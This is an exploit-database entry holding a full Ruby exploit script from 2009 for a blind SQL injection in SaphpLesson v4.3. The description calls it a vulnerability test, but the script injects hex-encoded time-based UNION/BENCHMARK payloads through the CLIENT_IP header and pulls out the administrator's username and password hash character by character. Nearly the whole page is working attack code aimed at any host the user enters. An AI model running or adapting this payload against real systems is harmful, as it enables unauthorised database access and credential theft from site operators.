SaphpLesson v4.3 Exploit

vendor:

SaphpLesson

by:

Jafer Al Zidjali

7.5

CVSS

HIGH

Blind SQL Injection

CWE

Product Name: SaphpLesson

Affected Version From: SaphpLesson v4.3

Affected Version To: SaphpLesson v4.3

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

This exploit is used to test for Blind SQL Injection vulnerability in SaphpLesson v4.3. It checks for the average response time and then tests for delayed response time. If the response time is more than 3 seconds, then the system is vulnerable to Blind SQL Injection.

Mitigation:

The vendor has released a public patch to address this vulnerability.

Source

Exploit-DB raw data:

#!/usr/bin/ruby

#=============================================#
#          SaphpLesson v4.3 Exploit           #
#     Blind SQL Injection Vulnerability       #
#---------------------------------------------#
# Date: 21-08-2009                            #
# Discovered & written by: Jafer Al Zidjali   #
# Email: jafer[at]scorpionds.com              #
# Website: www.scorpionds.com                 #
#---------------------------------------------#
# Notes:                                      #
#       1. Author has been notified           #
#       2. A public patch has been released   #
#=============================================#


require "net/http"
require "base64"

intro=[
          "+=============================================+",
          "+          SaphpLesson v4.3 Exploit           +",
          "+     Blind SQL Injection Vulnerability       +",
          "+  Discovered & written by: Jafer Al Zidjali  +",
          "+        Email: jafer[at]scorpionds.com       +",
          "+         Website: www.scorpionds.com         +",
          "+=============================================+"
          ]

def print_intro text
  w="|"
  text.each do |str|
    str.scan(/./) do |c|
        STDOUT.flush
      if w=="|" 
        print "\b"+c +w
        w="/"
      elsif w=="/" 
        print "\b"+c +w
        w="-"  
      elsif w=="-" 
        print "\b"+c +w
        w="\\" 
      else
      print "\b"+c +w
      w="|"
      end
      sleep 0.04
    end
    print "\b "
    puts ""
  end
end

print_intro intro

puts "\nEnter host name (e.g. example.com):"
host=gets.chomp

puts "\nEnter script path (e.g. /saphplesson/):"
path=gets.chomp


puts "\nGetting average response time..."

avgTime=Array.new(5)

5.times do |c|
  s=Time.now
  http = Net::HTTP.new(host, 80)
  resp= http.get(path)
  w=resp.body
  avgTime[c]=Time.now-s
  puts avgTime[c]
end

sum=0
5.times {|c| sum+=avgTime[c]}
avg=sum/5.0
puts "Average response time is: #{avg*3.0}"

puts "\nTesting delayed response time..."
delTime=Array.new(5)

5.times do |t|
  delay=1000000*((t+1)*10)
  header={
  "CLIENT_IP" =>  "\x27\x20\x55\x4e\x49\x4f\x4e\x20\x53\x45\x4c\x45\x43\x54"+
                  "\x20\x49\x46\x28\x31\x3d\x31\x2c\x42\x45\x4e\x43\x48\x4d"+
                  "\x41\x52\x4b\x28#{delay}\x2c\x63\x68\x61\x72\x28\x63\x68"+
                  "\x61\x72\x28\x32\x29\x29\x29\x2c\x33\x34\x33\x34\x29\x20\x23\x20"
  }
  s=Time.now
  http = Net::HTTP.new(host, 80)
  resp= http.get(path,header)
  w=resp.body
  s=Time.now-s
  delTime[t]=delay
  puts "["+(t+1).to_s+"] #{s}"
end

puts "\nChoose a delyed response time (it should be > average response time):"
sel=gets.chomp

print "\nGetting username length"
ulen=0

20.times do |z|
  header={
  "CLIENT_IP" =>  "\x27\x20\x55\x4e\x49\x4f\x4e\x20\x53\x45\x4c\x45\x43\x54"+
                  "\x20\x49\x46\x28\x6c\x65\x6e\x67\x74\x68\x28\x28\x73\x65\x6c\x65\x63\x74"+
                  "\x20\x4d\x6f\x64\x4e\x61\x6d\x65\x20\x66\x72\x6f\x6d\x20\x6d\x6f\x64\x72"+
                  "\x65\x74\x6f\x72\x20\x77\x68\x65\x72\x65\x20\x4d\x6f\x64\x49\x44\x3d\x31"+
                  "\x29\x29\x3d#{z+1}\x2c\x42\x45\x4e\x43\x48\x4d\x41\x52\x4b\x28#{delTime[(sel.to_i)-1]}"+
                  "\x2c\x63\x68\x61\x72\x28\x63\x68\x61\x72\x28\x32\x29\x29\x29\x2c\x33\x34\x33\x34\x29\x20\x23\x20"
  }
  s=Time.now
  http = Net::HTTP.new(host, 80)
  resp= http.get(path,header)
  w=resp.body
  s=Time.now-s
  print "."
    if (s>(avg*3.0))
      ulen=z+1
      break;
    end
  STDOUT.flush
end

puts "\n\nUsername length: "+ ulen.to_s

puts "\n\nUsername: "
chars="abcdefghijklmnopqrstuvwxyz0123456789"

ulen.times do |z|
  chars.scan(/./) do |c|
    header={
    "CLIENT_IP" => "\x27\x20\x55\x4e\x49\x4f\x4e\x20\x53\x45\x4c\x45\x43"+
    "\x54\x20\x49\x46\x28\x73\x75\x62\x73\x74\x72\x69\x6e\x67\x28\x28\x73"+
    "\x65\x6c\x65\x63\x74\x20\x4d\x6f\x64\x4e\x61\x6d\x65\x20\x66\x72\x6f"+
    "\x6d\x20\x6d\x6f\x64\x72\x65\x74\x6f\x72\x20\x77\x68\x65\x72\x65\x20"+
    "\x4d\x6f\x64\x49\x44\x3d\x31\x29\x2c#{z+1}\x2c\x31\x29\x3d\x27#{c}\x27"+
    "\x2c\x42\x45\x4e\x43\x48\x4d\x41\x52\x4b\x28#{delTime[(sel.to_i)-1]}"+
    "\x2c\x63\x68\x61\x72\x28\x63\x68\x61\x72\x28\x32\x29\x29\x29\x2c\x33"+
    "\x34\x33\x34\x29\x20\x23\x20"
    }
    s=Time.now
    http = Net::HTTP.new(host, 80)
    resp= http.get(path,header)
    w=resp.body
    s=Time.now-s
    print c
      if (s>(avg*3.0))
        break;
      end
    print "\b"
    STDOUT.flush
  end
end

puts "\n\nPassword hash: "
chars="0123456789abcdef"

32.times do |z|
  chars.scan(/./) do |c|
    header={
    "CLIENT_IP" => "\x27\x20\x55\x4e\x49\x4f\x4e\x20\x53\x45\x4c\x45\x43\x54"+
    "\x20\x49\x46\x28\x73\x75\x62\x73\x74\x72\x69\x6e\x67\x28\x28\x73\x65\x6c"+
    "\x65\x63\x74\x20\x4d\x6f\x64\x50\x61\x73\x73\x77\x6f\x72\x64\x20\x66\x72"+
    "\x6f\x6d\x20\x6d\x6f\x64\x72\x65\x74\x6f\x72\x20\x77\x68\x65\x72\x65\x20"+
    "\x4d\x6f\x64\x49\x44\x3d\x31\x29\x2c#{z+1}\x2c\x31\x29\x3d\x27#{c}\x27\x2c"+
    "\x42\x45\x4e\x43\x48\x4d\x41\x52\x4b\x28#{delTime[(sel.to_i)-1]}"+
    "\x2c\x63\x68\x61\x72\x28\x63\x68\x61\x72\x28\x32\x29\x29\x29\x2c\x33\x34"+
    "\x33\x34\x29\x20\x23\x20"
    }
    s=Time.now
    http = Net::HTTP.new(host, 80)
    resp= http.get(path,header)
    w=resp.body
    s=Time.now-s
    print c
      if (s>(avg*3.0))
        break;
      end
    print "\b"
    STDOUT.flush
  end
end

# milw0rm.com [2009-09-16]